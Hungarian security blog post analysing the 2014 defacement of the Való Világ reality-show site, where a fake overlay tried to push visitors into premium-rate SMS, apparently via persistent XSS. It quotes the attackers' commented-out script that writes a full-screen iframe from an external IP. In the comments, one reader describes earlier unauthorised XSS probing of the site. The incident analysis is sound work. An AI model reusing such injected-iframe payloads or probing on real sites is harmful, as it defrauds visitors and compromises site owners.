Tweets by @buherablog
profile for buherator at IT Security Stack Exchange, Q&A for IT security professionals

A BitBetyár Blog

Túljártál a nagyokosok eszén? Küldd be a mutatványodat! (e-mail a buherator gmailkomra jöhet)

Full-Disclosure / Névjegy / Coming out


Promó

H.A.C.K.

Címkék

0day (110) adobe (87) adobe reader (21) anonymous (26) apple (60) az olvasó ír (49) blackhat (20) botnet (22) bug (200) buherablog (44) buhera sörözés (39) bukta (49) deface (38) dns (22) dos (29) esemény (82) facebook (26) firefox (64) flash (33) gondolat (31) google (59) google chrome (36) hacktivity (37) hírek (117) incidens (224) internet explorer (88) iphone (35) java (50) jog (22) kína (21) kriptográfia (68) kultúra (21) linux (24) malware (43) microsoft (142) móka (48) mozilla (23) office (26) oracle (40) os x (43) patch (197) php (20) politika (31) privacy (58) programozás (22) safari (34) sql injection (62) windows (85) xss (77) Címkefelhő

Licensz

Creative Commons Licenc

Való Világ

2014.01.20. 09:06 | buherator | 12 komment

Nem gondoltam, hogy valaha meg fogok emlékezni a Való Világról ezen blog hasábjain, de úgy tűnik, hogy hosszú idő után ezt a szerveződést érte az a "megtiszteltetés", hogy automatizált botok helyett céltudatosabb támadók deface-eljék a weboldalát

Ahogy az a comment:com posztjából kiderül, a támadók egy kamu ablakot szerkesztettek, melyben emelt díjas SMS küldésre próbálták rávenni a látogatókat. A felületelem egy külföldi hoszting szolgáltatónál elhelyezett Javascripttel töltődött be, ami szerencsére még mindig elérhető (bár az egyetlen utasítást kikommentezték):

$ cat i.js
//document.write("<iframe id=\"vvonline\" style=\"border: 0; position:fixed; top:0; left:0; right:0; bottom:0; width:100%; height:100%\" src=\"http:\/\/23.92.60.124\/online.php\"> <\/iframe>");

Az online.php tartalmazza magát a megjelenő HTML kódot, az általam sebtiben le-wgetelt változatban nincs malware, ami arra utal, hogy nem profi malware-gazdákkal van dolgunk, mivel feltehetően nem volt kész botnet infrastruktúra, amibe be tudták volna húzni a valóságshow iránt érdeklődőket. A betöltődő oldal az "élőkép" helyére egy sima JPG-t rak, amiből egy gyors strings után megkaphatjuk a kép készítéséhez használt szoftver nevét, illetve a létrehozás idejét:

PhotoFiltre Studio X
2014:01:19 19:20:24

Nálam ügyesebb forensic expertek számára learchiváltam a fájlokat.

 

Machiavellinek a screenshot alapján valószínűleg igaza van abban, hogy a problémát egy kommentben triggerelhető perzisztens XSS okozta.

Címkék: incidens xss deface való világ

Kommentek:

A hozzászólások a vonatkozó jogszabályok  értelmében felhasználói tartalomnak minősülnek, értük a szolgáltatás technikai  üzemeltetője semmilyen felelősséget nem vállal, azokat nem ellenőrzi. Kifogás esetén forduljon a blog szerkesztőjéhez. Részletek a  Felhasználási feltételekben és az adatvédelmi tájékoztatóban.

dxt3r 2014.01.20. 09:43:09

Fura, mert a kommenteket moderálják tudtommal. En próbáltam régebben <b> taget becsempészni kommentbe, de akkor nem ment át a moderáción (ez asszem még tavaly előtt volt).

imrus100 2014.01.20. 10:51:23

Feedly-ben olvasva elég érdekes a poszt: a //document.write("-ig minden rendben, de ezután megjelenik egy frame, benne a blog fejléce, stb, "Sajnos nincs megjeleníthető bejegyzés...' üzenettel.

Szapi · http://webrontgen.hu 2014.01.20. 15:37:12

@dxt3r: nem biztos hogy explicit < és > jeleket kell írni. Ahogy az sem biztos, hogy a komment szövegébe kell ezt betenni.

dxt3r 2014.01.20. 15:56:53

@Szapi: ez jogos, bár szerintem ez a legvalószínűbb, mivel az RTL valami saját gyártmányú frameworköt használ + ha a kommenteket továbbra is moderálják, akkor viszonylag kevés próbálkozás után feltűnne a turpisság a moderátorok oldalán.

Ja és még egy fun fact: amikor volt régebben VV4/5 szereplőválgatós form, akkor oda tettem XSS-t amivel meg is találtam az admin felületüket, de a Basic Authon már nem jutottam át, és úgy döntöttem, hogy többet nem szórakozom velük.

|Z| 2014.01.20. 21:58:36

Az hogy egy HTTP kérésre a támadó oldal mit válaszol, sok mindentől függhet:

1. user-agent: más lehet a válasz wget és más IE user-agent esetén
2. IP cím: különböző lehet a válasz attól függően hogy milyen IP címről jössz, melyik országból, nézted-e már az oldalt, stb.
3. referer: megfelelő-e a referer? Ha nem, akkor megint más választ kaphatsz.
4. cookie: Megfelelően beállított cookie értékeket használsz? Ha nem, akkor más választ kapsz.

Összefoglalva: most itt csak okoskodok, valószínűleg nem volt malware a html-ben, de ezt általános esetben nehéz megállapítani.

buherator · http://buhera.blog.hu 2014.01.21. 09:25:07

@|Z|: Ezért emeltem ki, hogy egy egyszerű wget-et használtam, hétfő reggel a wc-zuhany között ennyire futotta :)

imrus100 2014.01.21. 12:08:52

@buherator: The email account that you tried to reach does not exist. Van viszont egy Google+ oldaluk, oda elküldtem.

buherator · http://buhera.blog.hu 2014.01.21. 12:11:05

@imrus100: Arra próbáltam volt célozni, hogy én nem igazán tudok mit tenni azzal, hogy a feedly bugos, az e-mail címet hasból írtam be.

imrus100 2014.01.21. 15:02:54

@buherator: Persze, nem is arra gondoltam, hogy te oldd meg :) Csak érdekes lehet itt a blogon, illetve az itt megfordulóknak nagyobb tapasztalata lehet a bug reportolásban.

blash 2014.01.22. 21:11:49

@buherator: feedspot is pont ugyanaddig jelenitette meg.